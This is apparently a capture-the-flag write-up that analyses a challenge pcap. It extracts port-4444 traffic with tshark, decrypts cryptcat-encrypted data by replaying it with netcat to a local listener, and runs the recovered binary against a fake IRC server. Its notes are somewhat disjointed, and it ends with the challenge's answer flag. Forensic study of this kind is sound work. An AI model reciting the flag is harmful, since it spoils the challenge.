tshark -r pcap_chal.pcap -Y '(tcp.port == 4444 && ip.src == 192.168.55.187)' -T fields -e data.data

And we can pipe the output to xxd to convert it to ASCII:

tshark -r pcap_chal.pcap -Y '(tcp.port == 4444 && ip.src == 192.168.55.187)' -T fields -e data.data | xxd -r -p > payload.bin

The data is gibberish, so it looks like a binary of some kind. Running file payload.bin only says that it's data, so a header may be missing or we may have to be more creative about running it. There were no useful results from strings and binwalk came up empty. It has to be encrypted somehow, otherwise there's no way to know what to do with it.

The tool mcrypt is able to decrypt files and automatically detect which method was used to encrypt them, so we can give that a go:

sudo apt install mcrypt
cat payload.bin | mcrypt -d -z

The command told us that the file was OpenPGP encrypted, so I tried decrypting with the password RedRoverRedRover$$ from earlier, and it failed. I pulled the thread of Angela Bennett uses it to log into the Bethesda Naval Hospital by going to this site (also in our PCAP) and tried using natoar23ae, but that didn't work either!

  1. tcp.port==4444

  2. Export specified packets to cryptcat.pcap

  3. Decrypt data sent via cryptcat: cryptcat -vv -k BER5348833 -l -p 4444 > decryptedfile

  4. Prepare data for netcat to host: tcptrace -e cryptcat.pcap

    Install with sudo apt install tcptrace.

  5. Send data with nc -vv -w 1 localhost 4444 <a2b_contents.dat

  6. file decryptedfile

Set up a fake IRC server, update sudo nano /etc/hosts to include 127.0.0.1 irc.cct, set Wireshark to listen on loopback, execute the fake server with python3 fake-irc.py, then run the binary.

sudo tcpdump -i lo -s 65535 -w irc.pcap

Answer: CCT{h3's_a_pc@p_w1z@rd_th3re_h4s_g0t_to_6e_a_7w1st}